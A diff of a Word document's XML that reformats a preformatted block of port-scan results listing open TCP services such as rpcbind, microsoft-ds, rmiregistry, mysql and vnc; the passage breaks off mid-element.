-        <w:pStyle w:val="HTMLPreformatted"/>
-        <w:pBdr>
-          <w:top w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:left w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:bottom w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:right w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-        </w:pBdr>
-        <w:shd w:val="clear" w:color="auto" w:fill="121314"/>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>111/tcp   open  rpcbind</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLPreformatted"/>
-        <w:pBdr>
-          <w:top w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:left w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:bottom w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:right w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-        </w:pBdr>
-        <w:shd w:val="clear" w:color="auto" w:fill="121314"/>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>139/tcp   open  netbios-ssn</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLPreformatted"/>
-        <w:pBdr>
-          <w:top w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:left w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:bottom w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:right w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-        </w:pBdr>
-        <w:shd w:val="clear" w:color="auto" w:fill="121314"/>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>445/tcp   open  microsoft-ds</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLPreformatted"/>
-        <w:pBdr>
-          <w:top w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:left w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:bottom w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:right w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-        </w:pBdr>
-        <w:shd w:val="clear" w:color="auto" w:fill="121314"/>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">111/tcp   open  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>rpcbind</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">139/tcp   open  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>netbios-ssn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">445/tcp   open  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>microsoft</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>-ds</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="line"/>
@@ -999,25 +1031,16 @@
         </w:rPr>
         <w:t>512/tcp   open  exec</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLPreformatted"/>
-        <w:pBdr>
-          <w:top w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:left w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:bottom w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:right w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-        </w:pBdr>
-        <w:shd w:val="clear" w:color="auto" w:fill="121314"/>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="line"/>
@@ -1028,25 +1051,16 @@
         </w:rPr>
         <w:t>513/tcp   open  login</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLPreformatted"/>
-        <w:pBdr>
-          <w:top w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:left w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:bottom w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:right w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-        </w:pBdr>
-        <w:shd w:val="clear" w:color="auto" w:fill="121314"/>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="line"/>
@@ -1057,257 +1071,282 @@
         </w:rPr>
         <w:t>514/tcp   open  shell</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLPreformatted"/>
-        <w:pBdr>
-          <w:top w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:left w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:bottom w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:right w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-        </w:pBdr>
-        <w:shd w:val="clear" w:color="auto" w:fill="121314"/>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>1099/tcp  open  rmiregistry</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLPreformatted"/>
-        <w:pBdr>
-          <w:top w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:left w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:bottom w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:right w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-        </w:pBdr>
-        <w:shd w:val="clear" w:color="auto" w:fill="121314"/>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>1524/tcp  open  ingreslock</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLPreformatted"/>
-        <w:pBdr>
-          <w:top w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:left w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:bottom w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:right w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-        </w:pBdr>
-        <w:shd w:val="clear" w:color="auto" w:fill="121314"/>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>2049/tcp  open  nfs</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLPreformatted"/>
-        <w:pBdr>
-          <w:top w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:left w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:bottom w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:right w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-        </w:pBdr>
-        <w:shd w:val="clear" w:color="auto" w:fill="121314"/>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>2121/tcp  open  ccproxy-ftp</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLPreformatted"/>
-        <w:pBdr>
-          <w:top w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:left w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:bottom w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:right w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-        </w:pBdr>
-        <w:shd w:val="clear" w:color="auto" w:fill="121314"/>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>3306/tcp  open  mysql</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLPreformatted"/>
-        <w:pBdr>
-          <w:top w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:left w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:bottom w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:right w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-        </w:pBdr>
-        <w:shd w:val="clear" w:color="auto" w:fill="121314"/>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>3632/tcp  open  distccd</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLPreformatted"/>
-        <w:pBdr>
-          <w:top w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:left w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:bottom w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:right w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-        </w:pBdr>
-        <w:shd w:val="clear" w:color="auto" w:fill="121314"/>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>5432/tcp  open  postgresql</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLPreformatted"/>
-        <w:pBdr>
-          <w:top w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:left w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:bottom w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:right w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-        </w:pBdr>
-        <w:shd w:val="clear" w:color="auto" w:fill="121314"/>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>5900/tcp  open  vnc</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLPreformatted"/>
-        <w:pBdr>
-          <w:top w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:left w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:bottom w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:right w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-        </w:pBdr>
-        <w:shd w:val="clear" w:color="auto" w:fill="121314"/>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">1099/tcp  open  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>rmiregistry</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">1524/tcp  open  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>ingreslock</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">2049/tcp  open  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>nfs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">2121/tcp  open  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>ccproxy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>-ftp</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">3306/tcp  open  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>mysql</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">3632/tcp  open  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
